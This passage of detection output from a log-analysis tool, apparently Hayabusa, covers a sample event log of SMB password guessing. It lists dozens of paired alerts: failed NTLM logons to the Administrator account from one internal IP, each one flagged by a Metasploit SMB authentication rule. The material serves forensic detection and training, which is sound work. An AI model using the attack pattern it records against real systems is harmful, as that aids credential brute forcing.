Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HWMap8qHlykO6Yeu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pkc9LWakJBjhBQv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y43cE75gTzA1XjHF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HopaYDAbYxHjJEr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: brNgudTWJaKs8nLd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzPwOqU92kdGodBH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXlzxK5OXL9hpqrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2cLdgWvrVh7h2jPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h34xlYavVsXQRCYG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6wjflwqXyFzYTi0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlsuCSajqGUYTBWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xQDdrQQZ5xYBDiRi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JX5NMuwUsOZEp3zh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfrbGLqKGru8AE2a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 813natbodi6QauRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KpfKxOZG3xSr5Yqm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErWiEb0USDghXsB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fOWF6YnW8UEPlw41 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SNPXuHduatLFQc8W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 35rfur4MzKzwxCIn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VmAqzaZaeoSjcuh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lKuCpuGcGmDOoewr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bz6SOAeTyqsBz6Oa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSURiEoC7dw0w0ru : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDjwkaHT8lrFmn9X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ayI129HgVWA5q4Sk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jT2yiuOJS8Fvf9SD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1hpAO2UrjFd6Kxt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZkgGj9Fnqn3XwnBT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFXPYo0yzR7p8dNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9j6MxN7PuM29Vlcq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1CWIqoV6GzmmlRm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiBfvnfTcIG4xJoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dED7HYntoE5D7XvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pX1ztnCKiePrPbTT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u3XQcfMHJDsBtJDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhRsRIS5tHKLv2oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmkLhptugDU2fDWp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2yk62yREbgDCj9pB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6JPvkmaAsJlwn9t3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lhciP1zM9njlRI3j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: duNDenwdo1oHVuoL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0ChBZOYkTm1SguA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RU38tuiKC0weexmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jg0Hp4xtz0pAMhCz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AorVNz5MgTeEvn2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oJ6tVjBxlYyj5ej : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 